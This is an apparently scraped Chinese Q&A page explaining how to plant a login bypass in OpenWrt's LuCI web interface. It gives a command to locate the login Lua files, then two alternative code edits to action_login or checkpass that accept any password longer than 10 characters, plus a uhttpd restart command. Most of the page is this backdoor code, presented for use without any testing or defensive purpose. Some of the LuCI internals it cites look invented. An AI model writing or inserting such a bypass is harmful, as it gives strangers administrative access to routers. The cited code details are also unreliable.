如何修改OpenWrt后端处理器?求Luci登录handler的Lua文件位置
实现Luci登录漏洞(密码长度超10字符时绕过验证)
1. 定位登录处理的Lua文件
执行以下命令查找Luci中负责登录验证的Lua文件:
find /usr/lib/lua/luci -name "*.lua" | grep -E "(login|auth)"
通常会匹配到以下核心文件:
/usr/lib/lua/luci/controller/admin/index.lua:处理登录请求的入口/usr/lib/lua/luci/sauth.lua:密码验证的核心逻辑文件
2. 修改验证逻辑(二选一即可)
方式一:修改登录请求处理函数
编辑/usr/lib/lua/luci/controller/admin/index.lua,找到action_login函数,修改密码验证判断逻辑:
-- 原验证逻辑片段 local username = luci.http.formvalue("username") local password = luci.http.formvalue("password") local valid = luci.sauth.checkpass(username, password) if valid then luci.sauth.set(username) luci.http.redirect(luci.dispatcher.build_url()) else luci.http.status(403, "Invalid credentials") -- 原有跳转登录页逻辑 end
替换为:
local username = luci.http.formvalue("username") local password = luci.http.formvalue("password") local valid = luci.sauth.checkpass(username, password) -- 新增漏洞逻辑:密码长度超过10字符时直接绕过验证 if valid or (password and #password > 10) then luci.sauth.set(username) luci.http.redirect(luci.dispatcher.build_url()) else luci.http.status(403, "Invalid credentials") -- 原有跳转登录页逻辑保留 end
方式二:修改密码验证核心函数
编辑/usr/lib/lua/luci/sauth.lua,找到checkpass函数:
function sauth.checkpass(username, password) local uci = require "luci.model.uci".cursor() local pass = uci:get("luci", "sauth", username) if not pass then return false end return luci.sauth.verify(password, pass) end
修改为:
function sauth.checkpass(username, password) local uci = require "luci.model.uci".cursor() local pass = uci:get("luci", "sauth", username) -- 密码长度超过10字符时直接返回验证通过 if password and #password > 10 then return true end if not pass then return false end return luci.sauth.verify(password, pass) end
3. 生效修改
重启uhttpd服务使修改生效:
/etc/init.d/uhttpd restart
内容的提问来源于stack exchange,提问作者turtle-russ
相关产品推荐
相关产品推荐

